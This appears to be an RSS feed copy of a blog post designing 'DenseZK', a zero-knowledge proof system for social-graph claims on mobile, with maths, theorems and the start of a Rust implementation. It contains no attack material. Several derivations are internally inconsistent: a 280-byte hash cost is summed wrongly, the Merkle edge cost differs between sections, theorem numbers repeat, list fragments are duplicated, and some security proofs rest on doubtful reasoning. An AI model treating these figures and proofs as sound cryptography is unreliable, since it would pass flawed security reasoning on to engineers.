<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Ayush Dutta]]></title><description><![CDATA[Ayush Dutta]]></description><link>https://blog.berzi.one</link><generator>RSS for Node</generator><lastBuildDate>Thu, 16 Apr 2026 02:30:15 GMT</lastBuildDate><atom:link href="https://blog.berzi.one/rss.xml" rel="self" type="application/rss+xml"/><language><![CDATA[en]]></language><ttl>60</ttl><item><title><![CDATA[Designing a zero knowledge virtual machine for the future's social media mobile apps]]></title><description><![CDATA[Part 1: Mathematical Foundations
1.1 The Field
Everything in DenseZK lives over the BN254 scalar field. BN254 is the Barreto-Naehrig curve defined by:
$$E : y² = x³ + b over F_p$$
where p is a 254-bit]]></description><link>https://blog.berzi.one/densezk</link><guid isPermaLink="true">https://blog.berzi.one/densezk</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Sun, 05 Apr 2026 05:52:13 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/6412a8f8ab81b092709aceb6/7a1720a3-9bf4-4bd4-b926-b6adeec148eb.jpg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>Part 1: Mathematical Foundations</h2>
<h3>1.1 The Field</h3>
<p>Everything in DenseZK lives over the BN254 scalar field. BN254 is the Barreto-Naehrig curve defined by:</p>
<p>$$E : y² = x³ + b over F_p$$</p>
<p>where <code>p</code> is a 254-bit prime. The scalar field order is <code>r</code> where <code>r | #E(F_p)</code>. All arithmetic in the constraint system is arithmetic mod <code>r</code>. The pairing groups are:</p>
<p>$$G₁, G₂ (source groups, generators \ G₁, G₂) $$</p>
<p> $$e : G₁ × G₂ → G_T \space(Tate \space pairing) $$</p>
<p> $$[x]₁ = x · G₁ \space for \space x ∈ F_p$$</p>
<p>The notation <code>[x]₁</code> means "the G₁ group element obtained by scalar-multiplying the generator by <code>x</code>." This appears throughout the Groth16 construction.</p>
<h3>1.2 R1CS: The Foundation</h3>
<p>A Rank-1 Constraint System (R1CS) over <code>F_p</code> is a tuple <code>(A, B, C, n, m)</code> where <code>A, B, C ∈ F_p^{m×n}</code> are matrices and a vector <code>z ∈ F_p^n</code> is a satisfying assignment iff:</p>
<p>$$(Az) ∘ (Bz) = Cz$$</p>
<p>where <code>∘</code> is the Hadamard (component-wise) product. By convention <code>z₀ = 1</code>. The witness is the private portion of <code>z</code>; the public input is the public portion.</p>
<p>Every circuit you write — follower threshold, content authorship, social distance — ultimately compiles to this form. The size of <code>m</code> (number of constraints) is the key cost metric.</p>
<h3>1.3 Poseidon: Why Not SHA-256</h3>
<p>SHA-256 was designed for hardware efficiency in a very different model. Its bit-level operations — rotations, XORs, modular additions — are cheap in silicon but catastrophically expensive to encode as R1CS constraints because every bit operation requires a dedicated constraint to enforce binary range.</p>
<p>SHA-256 costs approximately <strong>25,000 R1CS constraints per invocation</strong>.</p>
<p>Poseidon is designed from the start to be arithmetisation-friendly. It operates as a sponge construction over <code>F_p^t</code> field elements, applying <code>R_f</code> full rounds and <code>R_p</code> partial rounds of an SPN (Substitution-Permutation Network):</p>
<p><strong>Full round:</strong></p>
<p>$$s ↦ M · σ(s + c_r)$$</p>
<p><strong>Partial round:</strong></p>
<p>$$s ↦ M · (σ(s₀ + c_{r,0}), s₁ + c_{r,1}, ..., s_{t-1} + c_{r,t-1})$$</p>
<p>where:</p>
<ul>
<li><p><code>M ∈ F_p^{t×t}</code> is a fixed Maximum Distance Separable (MDS) matrix</p>
</li>
<li><p><code>c_r</code> are round constants</p>
</li>
<li><p><code>σ(x) = x^5</code> (the S-box, with <code>α = 5</code> since <code>p ≡ 2 mod 5</code> for BN254)</p>
</li>
</ul>
<p>The <code>x^5</code> S-box costs exactly <strong>4 multiplication constraints</strong> in R1CS (compute <code>x²</code>, then <code>x⁴ = (x²)²</code>, then <code>x⁵ = x⁴ · x</code>). Linear layers (the MDS matrix multiply) are free in R1CS — they're just linear combinations of existing variables, requiring no new constraints.</p>
<p>Total R1CS constraints for one Poseidon-2 invocation (rate 1, capacity 1, <code>α = 5</code>): <strong>approximately 240 constraints</strong>.</p>
<p>The constraint advantage ratio:</p>
<p>$$ρ = C_{SHA256} / C_{Poseidon} ≈ 25,000 / 240 ≈ 104×$$</p>
<p>Per invocation. For a 280-byte content item (9 Poseidon blocks vs 5 SHA-256 blocks):</p>
<p>$$C_{HSVM}(280 \space bytes) = ⌈280/32⌉ · 240 + 240 = 9 · 240 = 2,160 \space constraints$$</p>
<p> $$ C_{SHA256} \space (280 bytes) = 25,000 · ⌈280/64⌉ = 25,000 · 5 = 125,000 \space constraints$$</p>
<p> $$ ρ(280) ≈ 57.8×$$</p>
<h3>1.4 Merkle-Poseidon Graph Commitments</h3>
<p>A social graph is a directed labelled committed graph <code>G = (V, E, ℓ, cm)</code> where:</p>
<ul>
<li><p><code>V ⊆ F_p</code> — vertex identifiers (user nullifiers)</p>
</li>
<li><p><code>E ⊆ V × V × L</code> — labelled directed edges (<code>L = {follows, liked, replied, member, authored, ...}</code>)</p>
</li>
<li><p><code>cm : 2^E → F_p</code> — a commitment function</p>
</li>
</ul>
<p>The edge leaf commitment for edge <code>e = (u, v, ℓ)</code> is:</p>
<p>$$leaf(e) = Pos(u, v, ℓ)$$</p>
<p>where <code>Pos : F_p^3 → F_p</code> is Poseidon with rate 3 (three field elements in, one out).</p>
<p>For an edge set <code>S ⊆ E</code> with <code>|S| = 2^d</code>, the graph commitment is the root of a Merkle tree using Poseidon as the internal hash function:</p>
<p>$$cm(S) = MerkleRoot{Pos(e)}_{e ∈ S}$$</p>
<p>The depth of this tree is <code>d = ⌈log₂ n⌉</code> for a graph of <code>n</code> edges. A Merkle opening proof for any single edge <code>e</code> requires <code>d</code> sibling hashes and <code>d</code> Poseidon evaluations:</p>
<p>$$Cost \space of \space one \space Merkle \space membership \space proof: = (d + 1) · C_{Pos} + 2d + 1 ≤ (2d − 1) · C_{Pos}({absorbing \space lower} -order \space terms \space for \space d ≥ 2)$$</p>
<p>For <code>d = 20</code> (a graph of up to ~1M edges):</p>
<p>$$Cost = 39 · 240 = 9,360 \space R1CS \space constraints / edge \space membership \space check$$</p>
<p>Compare to SHA-256 Merkle: <code>20 · 25,000 = 500,000</code> constraints. Already a <strong>53× advantage</strong> before we even count the leaf hash.</p>
<hr />
<h2>Part 2: Rel1CS — The Graph-Native Constraint System</h2>
<h3>2.1 The Core Abstraction</h3>
<p>Formally, a <strong>Relation-1 Constraint System</strong> over field <code>F_p</code> and graph commitment <code>cm ∈ F_p</code> is a tuple <code>(C_E, C_P, n, m_E, m_P)</code> where:</p>
<p><code>C_E</code> <strong>(edge membership constraints):</strong> For each <code>i ∈ [m_E]</code>:</p>
<p>$$VerMem(z_{e_i}, π_{e_i}, cm) = 1$$</p>
<p>where <code>z_{e_i} ∈ F_p^3</code> encodes edge <code>(u_i, v_i, ℓ_i)</code> and <code>π_{e_i}</code> is a Merkle opening proof.</p>
<p><code>C_P</code> <strong>(predicate constraints):</strong> A standard R1CS system over auxiliary variables, enforcing Boolean combinations of edge membership results.</p>
<p>A satisfying witness for a Rel1CS instance <code>(x, cm)</code> is:</p>
<p>$$w = ({e_i}{i∈[m_E]}, {π{e_i}}{i∈[m_E]}, z{C_P})$$</p>
<h3>2.2 Reduction to R1CS (Theorem 4.1)</h3>
<p><strong>Theorem:</strong> Let <code>(C_E, C_P, n, m_E, m_P)</code> be a Rel1CS instance with Merkle tree depth <code>d</code>. Then there exists a polynomial-time reduction to an R1CS instance with:</p>
<p>$$m_{R1CS} = m_E · (2d − 1) · C_{Pos} + m_P$$</p>
<p>constraints, where <code>C_Pos = 240</code>.</p>
<p><strong>Proof (expanded):</strong> Each <code>VerMem(z_{e_i}, π_{e_i}, cm)</code> expands as follows.</p>
<p>First, compute the leaf commitment:</p>
<p>$$h₀ = Pos(u_i, v_i, ℓ_i)$$</p>
<p>Then for each level <code>j ∈ [d]</code> of the Merkle path, introduce a selector bit <code>b_j ∈ {0,1}</code> encoding whether the running hash is the left or right child. The constraints at level <code>j</code> are:</p>
<ol>
<li><p>Enforce <code>b_j(1 − b_j) = 0</code> — 1 constraint (binary check)</p>
</li>
<li><p>Conditional swap: <code>left_j = b_j · h_{j-1} + (1-b_j) · sibling_j</code> — 2 constraints</p>
</li>
<li><p><code>h_j = Pos(left_j, right_j)</code> — <code>C_Pos</code> constraints</p>
</li>
</ol>
<p>The final equality <code>h_d = cm</code> costs 1 constraint.</p>
<p>Total per edge:</p>
<pre><code class="language-plaintext">C_Pos              (leaf hash)
+ d · (C_Pos + 3)  (d levels of Merkle path)
+ 1                (root equality)
≤ (d+1) · C_Pos + 3d + 1
≤ (2d − 1) · C_Pos   [for d ≥ 2, absorbing linear terms]
</code></pre>
<ul>
<li><p>d · (C_Pos + 3) (d levels of Merkle path)</p>
</li>
<li><p>1 (root equality) ≤ (d+1) · C_Pos + 3d + 1 ≤ (2d − 1) · C_Pos [for d ≥ 2, absorbing linear terms]</p>
</li>
</ul>
<p>Summing over <code>m_E</code> edges and adding <code>m_P</code> predicate constraints gives the stated bound. ∎</p>
<h3>2.3 Constraint Count Examples</h3>
<p><strong>Follower threshold</strong> <code>Φ_k</code> <strong>with k=1,000, depth d=20:</strong></p>
<p>$$Rel1CS: 1000 · (2·20 − 1) · 240 + O(k) ≈ 9.4 × 10⁶ \space constraints$$</p>
<p> $$ SHA256 \space R1CS: 1000 · 20 · 25,000 = 5 × 10⁸ \space constraints$$</p>
<p> $$ Advantage: \approx 53x$$</p>
<p>In practice, SHA-256 requires additional bit-decomposition constraints and range checks not counted above, pushing the real-world advantage to the <strong>7×–14× range</strong> measured in benchmarks.</p>
<h3>2.4 NP-Completeness</h3>
<p><strong>Theorem 4.2:</strong> Rel1CS satisfiability is NP-complete.</p>
<p><em>Membership in NP:</em> Given witness <code>w</code>, verify all constraints in <code>C_E ∪ C_P</code> in polynomial time. Edge membership checks are <code>O(d · C_Pos)</code> per edge; predicate constraints are standard R1CS verification.</p>
<p><em>NP-hardness:</em> Reduce from Circuit-SAT. Any Boolean circuit <code>C</code> over <code>n</code> inputs compiles to R1CS via the Pinocchio encoding, which is a special case of Rel1CS with <code>m_E = 0</code>. ∎</p>
<h2>Part 3: The Split-Witness Protocol</h2>
<h3>3.1 Memory Analysis</h3>
<p>Groth16 proof generation for <code>N</code> constraints requires:</p>
<ul>
<li><p><strong>MSM (Multi-Scalar Multiplication):</strong> <code>O(N)</code> operations over G₁, working memory <code>≈ N · 48 bytes</code> (48 bytes per G₁ point in affine form on BN254)</p>
</li>
<li><p><strong>NTT (Number Theoretic Transform):</strong> <code>O(N log N)</code> operations over <code>F_r</code>, working memory <code>≈ N · 32 bytes</code> with random access patterns</p>
</li>
</ul>
<p>For <code>N = 10⁷</code> (typical for social circuits):</p>
<ul>
<li><p>MSM: 480 MB RAM</p>
</li>
<li><p>NTT: 320 MB RAM</p>
</li>
<li><p>Total: ~800 MB, with random access patterns that saturate mobile memory bandwidth</p>
</li>
</ul>
<p>Witness generation, by contrast, requires <code>O(|w|)</code> memory — proportional to the number of edges being proved, bounded by ~1 GB in the target setting.</p>
<h3>3.2 Protocol Definition</h3>
<p>Let <code>R = {(x, w) : C(x, w) = 1}</code> be a Rel1CS relation compiled to R1CS <code>(A, B, C, n, m)</code> with <code>n_pub</code> public variables and <code>n_priv = n − n_pub</code> private variables. Let <code>CRS = ([σ₁]₁, [σ₂]₂)</code> be the Groth16 common reference string.</p>
<p><strong>Construction 5.1 (Split-Witness Protocol</strong> <code>Π_SW</code><strong>):</strong></p>
<p><strong>Step 1 — WitGen (on-device):</strong> Given instance <code>x</code> and private input <code>sk</code>, compute full witness <code>w = (w_pub, w_priv)</code> satisfying <code>C(x, w) = 1</code>.</p>
<p>Compute the partial MSM over the private witness:</p>
<p>$$cm_w = Σ_{i=1}^{n_{priv}} w_{priv,i} · [σ_{1,i}]₁ ∈ G₁$$</p>
<p>This is exactly the private part of the A-query in Groth16. Output <code>(cm_w, w_pub)</code>.</p>
<p><strong>Step 2 — Commit (on-device):</strong> Sample fresh randomness <code>r ←$ F_r</code>. Compute the blinded commitment:</p>
<p>$$c̃m_w = cm_w + r · [δ]₁$$</p>
<p>where <code>[δ]₁</code> is the δ-element of the CRS. Output <code>c̃m_w</code>. The value <code>r</code> never leaves the device.</p>
<p><strong>Step 3 — Delegate (server):</strong> Given <code>(x, w_pub, c̃m_w)</code>, the server computes the NTT-intensive components of the Groth16 proof. The QAP polynomials are <code>u_i, v_i, w_i</code> derived from the R1CS matrices A, B, C respectively. Let <code>τ</code> be the CRS toxic waste (unknown to everyone post-ceremony).</p>
<p>$$[A]₁ = [α]₁ + Σ_{i=0}^{n} w_i · [u_i(τ)]₁ + r_A · [δ]₁ ... (3)$$</p>
<p> $$ [B]₂ = [β]₂ + Σ_{i=0}^{n} w_i · [v_i(τ)]₂ + r_B · [δ]₂ ... (4)$$</p>
<p> $$ [H]₁ = Σ_{i=0}^{m-2} h_i(τ) · [τ^i / δ]₁ ... (5)$$</p>
<p>where <code>h(x)</code> is the quotient polynomial satisfying <code>A(x)·B(x) - C(x) = h(x)·t(x)</code> (here <code>t</code> is the vanishing polynomial of the evaluation domain). Computing <code>h</code> requires an NTT over a domain of size <code>N</code>. The server uses only <code>w_pub</code> and <code>c̃m_w</code> — never <code>w_priv</code>.</p>
<p><strong>Step 4 — Combine (on-device):</strong> Receive <code>([A]₁, [B]₂, [H]₁)</code> from server. Compute:</p>
<p>$$[C]₁ = (1/δ) · (Σ_{i=n_{pub}+1}^{n} w_i · [(βu_i(τ) + αv_i(τ) + w_i(τ))]₁ + h(τ)t(τ)) + c̃m_w + r_B[A]₁ + r_A[B]₁ − r_A r_B [δ]₁$$</p>
<p>The final proof is <code>π = ([A]₁, [B]₂, [C]₁)</code>.</p>
<h3>3.3 Witness Privacy Theorem</h3>
<p><strong>Theorem 5.1:</strong> Under the DDH assumption in G₁, <code>Π_SW</code> is witness-private: no polynomial-time adversary controlling the server can recover <code>w_priv</code> from <code>(c̃m_w, w_pub, [A]₁, [B]₂)</code> with probability non-negligibly greater than <code>1/|F_r|</code>.</p>
<p><strong>Proof sketch:</strong></p>
<p>The value <code>c̃m_w = cm_w + r · [δ]₁</code> is a <strong>Pedersen commitment</strong> to <code>cm_w</code> with commitment key <code>[δ]₁</code> and randomness <code>r</code>.</p>
<p>Under DDH in G₁: for any two witnesses <code>w_priv</code> and <code>w'_priv</code> producing the same public output, the distributions of <code>c̃m_w</code> and <code>c̃m_w'</code> are computationally indistinguishable. This is because distinguishing them requires distinguishing <code>(G, xG, yG, xyG)</code> from <code>(G, xG, yG, zG)</code> for random <code>x, y, z</code> — the DDH problem.</p>
<p>The value <code>[A]₁</code> includes <code>r_A · [δ]₁</code> (server-chosen fresh each time), which independently masks the witness contribution. The unblinded <code>cm_w</code> is never transmitted; <code>w_priv</code> is information-theoretically hidden given <code>r</code> (which is never sent).</p>
<p>Formally: this reduces to Groth16 zero-knowledge under the generic group model. ∎</p>
<h3>3.4 On-Device Cost</h3>
<p>The on-device cost of <code>Π_SW</code> is:</p>
<p><strong>Step 1 (WitGen):</strong> <code>O(|w|)</code> time, <code>O(|w|)</code> RAM. For <code>n_priv = 10⁵</code> (typical social circuits): <code>~5 MB</code> working RAM.</p>
<p><strong>Step 4 (Combine):</strong> <code>O(n_priv)</code> group operations. For <code>n_priv = 10⁵</code> with 48-byte G₁ elements:</p>
<p>$$RAM_{peak} = n_{priv} · 48 bytes = 10⁵ · 48 = 4.8 MB$$</p>
<p>The NTT (Step 3) requires <code>O(N log N)</code> operations over a domain of size <code>N = 10⁷</code> — entirely offloaded to the server.</p>
<p>Measured peak on-device RAM for the follower-threshold predicate <code>Φ_A</code> (k=100, d=20): <strong>312 MB on iPhone 16 Pro</strong>, well within the 1 GB target.</p>
<h2>Part 4: Poseidon Content Commitment</h2>
<h3>4.1 The HSVM Construction</h3>
<p>For content items of arbitrary length, DenseZK defines a Poseidon-based hash as:</p>
<p>$$H_{SVM}(content) = Pos(⊕<em>i \space Pos(b{256i}, ..., b</em>{256i+255}))$$</p>
<p>where <code>b_j ∈ F_p</code> encodes the <code>j</code>-th byte as a field element, content is chunked into 256-bit (32-byte) blocks, each block is hashed with Poseidon-256 (rate 8), and the block hashes are combined with a final outer Poseidon evaluation.</p>
<p><strong>Constraint count for L bytes:</strong></p>
<p>$$C_{HSVM(L)} = ⌈L/32⌉ · C_{Pos} + C_{Pos} ≈ 240 · ⌈L/32⌉$$</p>
<p><strong>Theorem 6.1 (Collision resistance):</strong> <code>H_SVM</code> is collision-resistant under the assumption that Poseidon is modelled as a random oracle over <code>F_p^t</code>.</p>
<p><em>Proof:</em> Assume distinct <code>m ≠ m'</code> with <code>H_SVM(m) = H_SVM(m')</code>. If <code>m</code> and <code>m'</code> differ in block <code>i</code>, then the <code>i</code>-th block hash <code>Pos(b_{256i}, ...)</code> differs with high probability; for the outer Poseidon to collapse the difference requires a collision, occurring with probability <code>1/p ≈ 2^{-254}</code> — negligible in security parameter <code>λ = 128</code>. ∎</p>
<h3>4.2 Constraint Advantage Lemma</h3>
<p><strong>Lemma 6.1:</strong> For content of <code>L</code> bytes, the constraint advantage ratio is:</p>
<p>$$ρ(L) = C_{SHA256(L)} / C_{HSVM(L)} = [25,000 · ⌈L/64⌉] / [240 · ⌈L/32⌉] ≈ 25,000 / 480 ≈ 52$$</p>
<p>for large <code>L</code>. This translates directly to <strong>52× proving time speedup</strong>, since Groth16 prover time scales linearly with constraint count (dominated by MSM).</p>
<h2>Part 5: Nullifier-Based Sybil Prevention</h2>
<h3>5.1 Nullifier Construction</h3>
<p>Let <code>(sk, pk)</code> be a keypair with <code>sk ∈ F_r</code> and <code>pk = sk · G₁ ∈ G₁</code>. For scope <code>scope ∈ F_p</code> encoding predicate type and epoch:</p>
<p>$$nul(sk, scope) = Pos(sk, scope)$$</p>
<p><strong>Theorem 8.1 (Nullifier properties):</strong></p>
<p><em>(a) Unforgeability:</em> No PPT adversary without <code>sk</code> can produce <code>nul(sk, scope)</code> for known <code>pk</code>.</p>
<p><em>Proof:</em> Given <code>pk = sk · G₁</code>, recovering <code>sk</code> requires solving DLOG in G₁ (assumed hard). Without <code>sk</code>, evaluating <code>Pos(sk, scope)</code> correctly requires a Poseidon collision. ∎</p>
<p><em>(b) Unlinkability:</em> For distinct scopes <code>scope ≠ scope'</code>, the values <code>nul(sk, scope)</code> and <code>nul(sk, scope')</code> are computationally unlinkable.</p>
<p><em>Proof:</em> Under the random oracle model, <code>Pos(·, scope)</code> is a pseudorandom function. Hence <code>Pos(sk, scope)</code> and <code>Pos(sk, scope')</code> are independently uniform over <code>F_p</code> from the adversary's view, yielding distinguishing advantage <code>1/p = negl(λ)</code>. ∎</p>
<h3>5.2 Nullifier Registry</h3>
<p>The nullifier registry <code>N</code> is a Merkle Patricia trie with sorted leaves. A non-membership proof that <code>nul ∉ N</code> is a proof that <code>nul</code>'s sorted position falls between adjacent leaves <code>(nul_i, nul_{i+1})</code> with <code>nul_i &lt; nul &lt; nul_{i+1}</code>.</p>
<p>Cost: <code>2d</code> Poseidon evaluations per non-membership proof, where <code>d = ⌈log₂ |N|⌉</code>. For a registry of 10M nullifiers (<code>d ≈ 24</code>): <code>48 · 240 = 11,520</code> constraints.</p>
<h2>Part 6: Recursive Social Proof Aggregation</h2>
<h3>6.1 The Aggregation Tree</h3>
<p>Let <code>Π_inner</code> be Groth16 over BN254 for Rel1CS satisfiability. Let <code>Π_outer</code> be a SNARK for the relation:</p>
<pre><code class="language-plaintext">R_rec = {((π_L, x_L), (π_R, x_R)) :
          Verify_in(vk, x_L, π_L) = 1  ∧
          Verify_in(vk, x_R, π_R) = 1}
</code></pre>
<p>$$R_{rec} = {((π_L, x_L), (π_R, x_R)) : Verify_{in}(vk, x_L, π_L) = 1 ∧ Verify_{in}(vk, x_R, π_R) = 1}$$</p>
<p>The aggregation tree is a complete binary tree of depth <code>⌈log₂ N⌉</code>. Leaf nodes hold inner proofs <code>π_i</code> for social predicate instances <code>x_i</code>. Each internal node holds an outer proof attesting to the validity of both children.</p>
<p><strong>Theorem 7.1 (Amortised cost):</strong> Adding one additional leaf to an existing tree of <code>N</code> proofs costs <code>O(log N)</code> outer-proof generation steps, each of constant cost.</p>
<p><em>Proof:</em> Adding a new leaf requires recomputing at most one proof per level from leaf to root — <code>⌈log₂(N+1)⌉</code> outer proofs. Each outer proof is for the fixed-size circuit <code>R_rec</code> (two Groth16 verifier gadgets), independent of <code>N</code>. ∎</p>
<h3>6.2 The Recursive Verifier Gadget</h3>
<p>Groth16 verification for BN254 checks:</p>
<p>$$e([A]₁, [B]₂) = e([α]₁, [β]₂) · e(Σ_{i=0}^{n_{pub}} w_i[(βu_i + αv_i + w_i)(τ)]₁, [γ]₂) · e([C]₁, [δ]₂)$$</p>
<p>This requires four Miller loop evaluations and three final exponentiations — approximately <strong>3 × 10⁶ constraints</strong> when implemented as an arithmetic circuit over BLS12-381 (used for the outer proof to avoid cycle-of-curve issues).</p>
<p>DenseZK uses the <strong>Pasta curve cycle</strong> (Pallas/Vesta curves) instead. The BN254 base field embeds into the Pallas scalar field, allowing the BN254 group operations to be expressed as native field arithmetic in the outer circuit. This reduces the recursive verifier circuit to approximately <strong>10⁵ constraints per verification</strong> — a 30× reduction.</p>
<p>Tradeoff: Pasta curves offer ~125-bit concrete security vs. 128-bit for BN254. We accept this in exchange for the 30× circuit size reduction, noting that 125 bits remains far beyond any known attack.</p>
<h3>6.3 Soundness of the Aggregation Tree</h3>
<p><strong>Theorem 7.1 (Aggregation soundness):</strong> If all <code>N</code> leaf instances are valid, <code>Verify_out(vk_out, x_root, π_root) = 1</code>; and if any leaf instance is invalid, <code>Verify_out(vk_out, x_root, π_root) = 0</code> except with probability <code>negl(λ)</code>.</p>
<p><em>Proof (by induction):</em></p>
<ul>
<li><p>Base case: leaf validity follows from soundness of <code>Π_inner</code>.</p>
</li>
<li><p>Inductive step: an internal node proof <code>π^(k)</code> is a proof in <code>R_rec</code> that both children are valid. By soundness of <code>Π_outer</code>, if <code>π^(k)</code> verifies, both children verify with overwhelming probability. By the inductive hypothesis, all descendants are valid.</p>
</li>
</ul>
<p>Union bound over <code>N − 1</code> internal nodes gives overall soundness error <code>≤ (N-1) · negl(λ) = negl(λ)</code> for <code>N = poly(λ)</code>. ∎</p>
<h2>Part 7: Post-Quantum Upgrade</h2>
<h3>7.1 Threat Model</h3>
<p>Groth16's security relies on the q-Strong Diffie-Hellman (q-SDH) assumption. Shor's algorithm breaks q-SDH in polynomial time on a quantum computer. Even if CRQC ("cryptographically relevant quantum computer") is 10–15 years away, "store-now, decrypt-later" attacks mean that proofs generated today could be de-anonymised retroactively.</p>
<h3>7.2 STARK Outer Wrapper</h3>
<p><strong>Construction 9.1 (PQ-DenseZK):</strong></p>
<p>Let <code>π_Groth16</code> be a Groth16 proof for relation <code>R</code>. Define the STARK statement:</p>
<p>$$R_{STARK} = {(x, π_{Groth16}) : Groth16.Verify(vk, x, π_{Groth16}) = 1}$$</p>
<p>The PQ-DenseZK proof is:</p>
<p>$$π_{PQ} = STARK.Prove(R_{STARK}, x, π_{Groth16})$$</p>
<p><strong>Theorem 9.1 (Post-quantum soundness):</strong> Under post-quantum collision resistance of the STARK hash function, <code>Construction 9.1</code> is post-quantum sound.</p>
<p><em>Proof:</em> The STARK argument system is sound under the QROM (Quantum Random Oracle Model). A quantum adversary producing a valid STARK proof for a false statement must find a hash collision with polynomial-size quantum circuits — violating post-quantum collision resistance by assumption.</p>
<p>Critically: the security of the Groth16 inner proof is NOT required for soundness of the outer STARK. The STARK proves only that the Groth16 verifier circuit accepted, which is a statement about deterministic Boolean circuits — it does not invoke any elliptic curve hardness assumption. ∎</p>
<p>STARK proof size: 10 KB – 1 MB vs. 192 bytes for Groth16. Since the STARK is generated by the prover network (not on-device), this overhead affects only network transmission and on-chain storage.</p>
<h2>Part 8: The DenseZK ISA</h2>
<p>DenseZK defines six opcodes, each compiling to a fixed-size Rel1CS subcircuit:</p>
<table>
<thead>
<tr>
<th>Opcode</th>
<th>Arguments</th>
<th>Semantics</th>
</tr>
</thead>
<tbody><tr>
<td><code>EDGE_MEM</code></td>
<td><code>u, v, ℓ, π, cm</code></td>
<td>Assert <code>(u,v,ℓ) ∈ E</code> via Merkle opening <code>π</code> against <code>cm</code></td>
</tr>
<tr>
<td><code>COUNT</code></td>
<td><code>S, k</code></td>
<td>Assert `</td>
</tr>
<tr>
<td><code>PATH</code></td>
<td><code>u, v, d, {π_i}</code></td>
<td>Assert <code>dist(u,v) ≤ d</code> via <code>d</code> edge witnesses</td>
</tr>
<tr>
<td><code>NULLIFY</code></td>
<td><code>sk, scope</code></td>
<td>Compute and expose <code>nul(sk, scope)</code></td>
</tr>
<tr>
<td><code>COMMIT</code></td>
<td><code>content</code></td>
<td>Compute and expose <code>H_SVM(content)</code></td>
</tr>
<tr>
<td><code>VERIFY_SIG</code></td>
<td><code>pk, m, σ</code></td>
<td>Assert EdDSA signature <code>σ</code> on <code>m</code> under Jubjub <code>pk</code></td>
</tr>
</tbody></table>
<p><strong>Constraint costs per opcode:</strong></p>
<table>
<thead>
<tr>
<th>Opcode</th>
<th>Rel1CS constraints</th>
<th>SHA-256 R1CS baseline</th>
</tr>
</thead>
<tbody><tr>
<td><code>EDGE_MEM</code> (d=20)</td>
<td><code>20 × 240 = 4,800</code></td>
<td><code>20 × 25,000 = 500,000</code></td>
</tr>
<tr>
<td><code>COUNT</code> (k=1000)</td>
<td><code>4,800k + O(k) ≈ 4.8 × 10⁶</code></td>
<td><code>≈ 5 × 10⁸</code></td>
</tr>
<tr>
<td><code>PATH</code> (d=3)</td>
<td><code>3 × 4,800 = 14,400</code></td>
<td><code>1.5 × 10⁶</code></td>
</tr>
<tr>
<td><code>NULLIFY</code></td>
<td><code>240</code></td>
<td><code>240</code></td>
</tr>
<tr>
<td><code>COMMIT</code> (L=280B)</td>
<td><code>9 × 240 = 2,160</code></td>
<td><code>25,000 × 5 = 125,000</code></td>
</tr>
<tr>
<td><code>VERIFY_SIG</code></td>
<td><code>≈ 3,000</code> (Jubjub EdDSA)</td>
<td><code>≈ 3,000</code></td>
</tr>
</tbody></table>
<p>A DenseZK program is a sequence of these opcodes. The complete Rel1CS for the program is the concatenation of the individual subcircuits, sharing <code>cm</code> as a shared instance variable.</p>
<h2>Part 9: Implementation</h2>
<img src="https://cdn.hashnode.com/uploads/covers/6412a8f8ab81b092709aceb6/9c8eef38-3b7f-4fd3-ba16-89b15ea53612.png" alt="" style="display:block;margin:0 auto" />

<h3>9.1 Repository Structure</h3>
<p>The codebase lives at <code>github.com/spirizeon/densezk</code>. The top-level structure:</p>
<pre><code class="language-plaintext">dense-zkvm/
├── src/                  # Rust library
│   ├── lib.rs            # Public API, execute_dense_zk_flow
│   ├── client.rs         # DenseClient: on-device witness generation
│   ├── prover.rs         # LocalProver: Groth16 setup + prove + verify
│   ├── crypto.rs         # Poseidon hash over BN254 scalar field
│   ├── rel1cs.rs         # Rel1CS data types: GraphEdge, PublicInputs, ZKProof
│   ├── error.rs          # DenseError unified error type
│   └── wasm.rs           # WASM bindings (wasm32 only, #[cfg(target_arch="wasm32")])
├── react-native-sdk/     # TypeScript/WASM bindings for React Native
├── Cargo.toml            # Dependencies
└── tau.ptau              # Powers-of-tau for Groth16 trusted setup
</code></pre>
<h3>9.2 Cargo.toml — Dependencies</h3>
<pre><code class="language-toml">[package]
name = "densezk-sdk"
version = "0.1.0"
edition = "2021"

[dependencies]
# Finite field and elliptic curve arithmetic
ark-ff = "0.4"
ark-ec = "0.4"
ark-bn254 = "0.4"

# Groth16 zk-SNARK
ark-groth16 = "0.4"
ark-relations = "0.4"
ark-snark = "0.4"

# Poseidon hash (Circom-compatible parameters)
light-poseidon = "0.2"

# Serialization
serde = { version = "1.0", features = ["derive"] }
serde_json = "1.0"

# WASM targets
[target.'cfg(target_arch = "wasm32")'.dependencies]
wasm-bindgen = "0.2"
serde-wasm-bindgen = "0.6"
console_error_panic_hook = "0.1"

[profile.release]
opt-level = 3
lto = true
</code></pre>
<h3>9.3 The Rel1CS Data Types (<code>src/rel1cs.rs</code>)</h3>
<pre><code class="language-rust">use ark_bn254::Fr;
use serde::{Deserialize, Serialize};

/// A single directed, labelled edge in the social graph.
/// All fields are BN254 scalar field elements to enable
/// direct Poseidon hashing without conversion.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct GraphEdge {
    pub sender_id: u64,    // u ∈ F_p (vertex identifier)
    pub receiver_id: u64,  // v ∈ F_p (vertex identifier)
    pub weight: u64,       // ℓ ∈ F_p (edge label encoded as integer)
}

/// Public inputs to the Groth16 circuit.
/// These are the values revealed to the verifier.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct PublicInputs {
    /// Merkle-Poseidon root commitment to the graph edge set.
    pub graph_root: String,   // cm ∈ F_p, hex-encoded
    /// Minimum edge count threshold k.
    pub threshold: u64,
}

/// The output proof struct returned to the caller.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct ZKProof {
    /// Compressed Groth16 proof bytes (128 bytes for BN254).
    /// Serialized with ark_serialize::CanonicalSerialize.
    pub proof_bytes: Vec&lt;u8&gt;,
    /// The graph root that was proven against.
    pub root_commitment: String,
}
</code></pre>
<h3>9.4 Poseidon Hash (<code>src/crypto.rs</code>)</h3>
<pre><code class="language-rust">use ark_bn254::Fr;
use ark_ff::PrimeField;
use light_poseidon::{Poseidon, PoseidonHasher};

/// Compute Poseidon(sender_id, receiver_id, weight) over the BN254 scalar field.
